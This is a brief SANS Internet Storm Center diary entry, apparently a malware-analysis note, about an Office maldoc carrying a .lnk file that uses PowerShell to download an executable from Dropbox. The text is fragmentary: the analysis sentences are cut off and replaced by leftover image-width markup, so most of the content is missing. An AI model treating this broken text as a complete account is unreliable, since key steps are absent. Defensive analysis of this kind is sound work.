Office maldoc + .lnk, (Sat, Jul 15th)

Reader nik submitted a malicious document. It width:867px” />

It width:852px” />

And then we can use Woanware width:829px” />

Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox.

Didier Stevens
Microsoft MVP Consumer Security
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.